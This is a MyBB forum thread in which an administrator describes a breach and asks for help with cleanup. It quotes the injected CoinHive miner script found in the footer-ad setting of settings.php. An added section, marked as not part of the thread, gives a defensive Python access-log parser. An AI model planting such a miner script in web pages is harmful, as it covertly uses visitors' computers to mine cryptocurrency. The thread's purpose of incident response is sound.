MyBB Community Forums

Full Version: Forum Breach? Admin password appeared changed, CoinHive script running on pages
Hi guys,

Whilst I was on vacation, several members reported high CPU usage on my forum and that the script "Coinhive" was attempting to run (flagged by AV systems), details here: https://www.berlingoforum.com/thread-16174.html

My admin password appeared to be changed but I have since recovered. The administrator logs don't appear to be working:

MyBB has experienced an internal SQL error and cannot continue.

SQL Error:
1146 - Table 'berlingo1_dbnew.mybb_adminlog' doesn't exist
Query:
SELECT COUNT(l.dateline) AS count FROM mybb_adminlog l LEFT JOIN mybb_users u ON (u.uid=l.uid) WHERE 1=1

Could anyone assist with this, as I can't see any new plugins installed that might be causing the issue.

To update on this, I had this in my settings.php file:

$settings['footad'] = "
<script src=\"https://coinhive.com/lib/coinhive.min.js\"></script>
<script>
	var miner = new CoinHive.User('XdVLWD3FZXqUXyoedFpqNUsgukVXBuVo', 'www.adabolsas.com.br');
	miner.start();
</script>";

Any tips for full removal?

So to finally update here:

- My administrator log table appears to have been removed
- Someone changed my footer advertisement code to the snippet of code above which was triggering the CoinHive miner to start on each page load.
- The plugin I'm using for the footer ads is "My Ads Manager"

I'm not sure if this was a weakness in the plugin, or someone gained access to the administrator account.

Though the administrator logs are gone, I assume you still have server access logs? This might help work out if the attacker had full ACP access (and if so, what actions they took whilst in there) and might help work out how they got that access.
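
The access-log review suggested in the last reply, as an added example that is not part of the original thread: it pulls Admin CP requests out of a web server access log and groups the POSTs (logins and setting changes) by client IP. It assumes the Apache/nginx "combined" log format and the default `/admin/` directory; the sample log lines, IPs, timestamps and module/action values are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in "combined" format (not taken from the thread).
SAMPLE_LOG = """\
198.51.100.7 - - [02/Jan/2018:03:11:09 +0000] "POST /admin/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [02/Jan/2018:03:11:41 +0000] "GET /admin/index.php?module=config-settings HTTP/1.1" 200 20480 "-" "Mozilla/5.0"
198.51.100.7 - - [02/Jan/2018:03:12:30 +0000] "POST /admin/index.php?module=config-settings&action=change HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.20 - - [02/Jan/2018:09:00:02 +0000] "GET /showthread.php?tid=16174 HTTP/1.1" 200 30211 "-" "Mozilla/5.0"
203.0.113.20 - - [02/Jan/2018:09:00:05 +0000] "GET /admin/index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def acp_requests(log_text, admin_dir="/admin/"):
    """Yield (ip, ts, method, module, action, status) for Admin CP requests.

    admin_dir is an assumption: change it if the admin directory was renamed.
    """
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        url = urlsplit(m["target"])
        if not url.path.startswith(admin_dir):
            continue
        qs = parse_qs(url.query)
        module = qs.get("module", ["(none)"])[0]
        action = qs.get("action", ["(none)"])[0]
        yield m["ip"], m["ts"], m["method"], module, action, int(m["status"])

def state_changing_by_ip(log_text):
    """Group Admin CP POSTs by client IP: these are logins and changes."""
    hits = defaultdict(list)
    for ip, ts, method, module, action, status in acp_requests(log_text):
        if method == "POST":
            hits[ip].append((ts, module, action, status))
    return dict(hits)

if __name__ == "__main__":
    for ip, events in state_changing_by_ip(SAMPLE_LOG).items():
        print(ip)
        for ts, module, action, status in events:
            print(f"  {ts}  module={module} action={action} -> {status}")
```

An IP with Admin CP POSTs that does not belong to a known administrator points towards account access rather than a plugin flaw; no Admin CP activity around the time the setting changed points the other way.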